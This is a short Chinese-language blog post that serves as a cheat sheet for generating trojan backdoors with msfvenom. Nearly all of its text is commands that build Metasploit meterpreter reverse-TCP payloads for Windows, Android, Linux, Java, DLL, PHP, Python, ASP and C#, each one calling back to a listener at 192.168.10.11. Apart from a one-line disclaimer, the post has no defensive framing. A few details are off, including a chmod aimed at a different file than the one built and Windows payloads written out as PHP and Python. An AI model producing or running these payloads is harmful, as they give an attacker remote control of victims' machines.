标签搜索

关于使用msfvenom生成各类木马后门

Toanle
2021-06-09 / 0 评论 / 108 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2021年06月13日,已超过1379天没有更新,若内容或图片失效,请留言反馈。

免责声明:如果您不确定自己在做什么,请不要尝试在本文中使用任何内容。

在windows系统下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f exe > abc.exe 

在安卓下:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=5555 R> apk.apk

在Linux下:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 R > /root/Desktop/toanle

注意:需要把toanle加权限 chmod +x ./test

在C语言里:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f c > shellcode.c

在php:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.php

在python里:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f raw > shell.py

在java里;

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 W > text.jar

在DLL里

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -a x86 -f dll > shell.dll

在asp或者aspx里:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f asp > shell.asp

在C#里:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.11 LPORT=4444 -f csharp > shellcode.txt
0

评论

博主关闭了当前页面的评论